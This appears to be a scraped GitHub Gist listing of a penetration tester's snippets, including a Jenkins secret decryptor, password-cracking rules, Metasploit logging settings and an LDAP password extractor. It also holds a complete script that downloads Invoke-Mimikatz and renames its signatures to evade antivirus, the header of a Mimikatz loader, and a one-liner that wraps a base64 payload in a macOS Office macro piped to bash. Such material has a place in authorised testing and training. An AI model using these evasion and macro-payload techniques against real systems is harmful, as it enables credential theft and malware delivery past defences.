Skip to content

Instantly share code, notes, and snippets.

View decrypt_jenkins2.rb
#!/usr/bin/env ruby
require 'base64'
require 'digest'
require 'openssl'
# Author: @thesubtlety
# Decrypts Jenkins 2 encrypted strings, code change introduced around Jenkins ver 2.44
# Based off work by juyeong, https://gist.github.com/juyeong/081379bd1ddb3754ed51ab8b8e535f7c
View custom_john.conf
[List.Rules:Try]
cAz"[0-9]"
cAz"[£!$@#-=_]"
cAz"[0-9][0-9]"
cAz"[0-9][£!$@#-=_]"
cAz"[£!$@#-=_][0-9]"
cAz"[0-9][0-9][0-9]"
cAz"[0-9][0-9][0-9][0-9]"
cA0"[0-9]"
cA0"[£!$@#-=_]"
View loggingprompt.md

In your ~/.msf directory, create a file msfconsole.rc

set ConsoleLoggin true
set LogLevel 5
set SessionLoggin true
set TimeStampOutput true
set PROMPT %T %L

For bash

@thesubtlety
thesubtlety / invoke_evasion.sh
Created May 16, 2018 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
View invoke_evasion.sh
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
@thesubtlety
thesubtlety / katz.cs
Created Aug 1, 2018
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
View katz.cs
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@thesubtlety
thesubtlety / macscriptify.sh
Created Aug 16, 2018
MacScriptify bash oneliner
View macscriptify.sh
# save oneliner as macscript.txt
$f=macscript.txt; echo "Dim s As String\n"; for each in $(base64 -w0 <<< $(cat f) | fold -w 90); do echo "s = s + \"$each\""; done | sed '0,/\ s\ \+/{s/\ \+//}'; echo 'MacScript "do shell script "" echo " & s & " | base64 -D | bash "" "'; echo 'End Sub'
@thesubtlety
thesubtlety / Fortune-1000-Company-Twitter-Accounts.csv
Created Sep 18, 2018 — forked from mbejda/Fortune-1000-Company-Twitter-Accounts.csv
Fortune 1000 companies Twitter Accounts. Twitter,domain, keywords, and description
View Fortune-1000-Company-Twitter-Accounts.csv
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
domain,name,keywords,description,twitter
walmartstores.com,Wal-Mart Stores,"SEC filing,Walmart photos,walmart stock,sustainability index,Wal-Mart,walmart annual reports,Walmart responsibility,executive speeches,walmart suppliers,global responsibility,walmart global sustainability report,walmart investors,Walmart interactive map,walmart history,privacy policy,financial reports,walmart news,Wal Mart,walmart sustainability,Walmart locations,Walmart videos,walmart story,Walmart,Walmart stores,walmart board of directors,community giving,walmart careers,Walmart jobs,sam walton","Find Walmart executive speeches, financial reports, press releases, downloadable photos and videos, and see an interactive map of our locations around the world.",walmart
gm.com,General Motors,,"General Motors is home to Buick, Cadillac, GMC and Chevrolet. Find the latest news about GM automotive innovations, investor relations and more. ",GM
ge.com,General Electric,,,generalelectric
chevron.com,ChevronTexaco,"cvx, chevrontexaco, cheveron,
@thesubtlety
thesubtlety / sans-sec660-recommended-reading.md
Created Jan 5, 2019
SANS SEC660 GXPN Recommended Reading
View sans-sec660-recommended-reading.md
@thesubtlety
thesubtlety / Get-GroupsRec.ps1
Created Jan 23, 2019
Get all AD group membership recursively (requires AD module)
View Get-GroupsRec.ps1
function Get-GroupsRec {
[CmdletBinding()]
param
(
[Parameter(Mandatory)]
[string]$User
)
$dn = (Get-ADUser $User).DistinguishedName
Get-ADGroup -LDAPFilter ("(member:1.2.840.113556.1.4.1941:={0})" -f $dn) | select -expand Name | sort Name
@thesubtlety
thesubtlety / parse_ldif_file.py
Created Apr 10, 2019
Parse an ldif file extracting the userPassword field
View parse_ldif_file.py
#!/usr/bin/env python
# pip install python-ldap
import sys, ldif
def main():
if len(sys.argv) != 3:
print("Usage: %s <ldif_dump.ldif> <outfile>") % sys.argv[0]
sys.exit(-1)
ldif_file = sys.argv[1]